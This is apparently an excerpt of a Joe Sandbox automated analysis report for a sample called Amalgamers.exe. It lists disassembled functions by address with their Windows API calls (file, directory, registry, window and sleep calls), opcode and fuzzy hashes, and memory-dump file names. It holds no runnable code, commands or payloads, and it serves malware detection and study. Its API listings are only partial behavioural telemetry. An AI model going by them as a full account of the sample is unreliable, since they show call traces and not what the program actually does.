Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD

Function 00405B39 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00405B3D
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19

Function 00405B14 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405B2D

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
Instruction ID: a6801623bae5b64e590af13d118403295127a001a29879099f28d41f07625d68
Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
Instruction Fuzzy Hash: A4D0C972504121ABC2102728AE0889BBB65DB54271702CA36F8A9A26B1DB304C569A98

Function 0040560A Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004031FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405610
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E

Function 00405E54 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E7D

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 7acc68ffa7400c9eee32ba1e20ae5f36fa8f71d611e671e2c7f17c05e0102792
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: F0E0E67201050DBFEF095F50DD0AD7B371DEB44744F00492EFA45D4090E6B5A9619A74

Function 00405BE0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403177,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BF4

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8

Function 00405BB1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4

Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EB4,?,?,?,?,00000002,Execute: ), ref: 00405E4A

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 00f586757f971d8fddb6ba1a4fa1948c276a5597575d42b2c7248084dade2010
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 36D0EC3200020DBADF115F90ED05FAB371EEB04710F004426BA55A5090D6759520AA58

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c83c83ea3c187ec2e5b5282ce166bf8f6b0eb1a8c5f39d84dce50b7dd6167720
Instruction ID: 16624c16aa0e128540259aec7752c58df5b2033d878da01750b81a807d48f065
Opcode Fuzzy Hash: c83c83ea3c187ec2e5b5282ce166bf8f6b0eb1a8c5f39d84dce50b7dd6167720
Instruction Fuzzy Hash: 73D012727041129BCB10EBE89B489DEB7A49B50328B308537D111F31D1D6B98A45A72D

Function 0040408B Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010444,00000000,00000000,00000000), ref: 0040409D

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
Instruction ID: b9763db4476a092513200920bafbf00b2c19ecde7e8b58ff16c676c9221c7c43
Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
Instruction Fuzzy Hash: 32C04C717406006AEA208B51DD49F0677946750B01F1484397751F50D4C674E410DA1C

Function 00404074 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18

Function 004031C4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 00404061 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E3D), ref: 0040406B

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E9

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7b9632354074489533dafd45b6bc4c0d3204f827ba2cfbbd71c55f5045c93cde
Instruction ID: 4f2bdf6dfe5cf4b60dd5b7335af101e6a5cbd4d7fd56710333224b44724b1ee5
Opcode Fuzzy Hash: 7b9632354074489533dafd45b6bc4c0d3204f827ba2cfbbd71c55f5045c93cde
Instruction Fuzzy Hash: BFD05B73B101419BD714E7F8B98485F73B4DB503153204837D441E2091D578C5424A28

Non-executed Functions

Function 00404A44 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A5C
GetDlgItem.USER32(?,00000408), ref: 00404A67
GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
LoadBitmapA.USER32(0000006E), ref: 00404AC4
SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
DeleteObject.GDI32(00000000), ref: 00404B3A
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
GetWindowLongA.USER32(?,000000F0), ref: 00404C74
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
ShowWindow.USER32(?,00000005), ref: 00404C93
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
ImageList_Destroy.COMCTL32(00000000), ref: 00404E63
GlobalFree.KERNEL32(00000000), ref: 00404E73
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
ShowWindow.USER32(?,00000000), ref: 00405012
GetDlgItem.USER32(?,000003FE), ref: 0040501D
ShowWindow.USER32(00000000), ref: 00405024

Strings

, xrefs: 00404FFC
N, xrefs: 00404CCE
M, xrefs: 00404BED

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
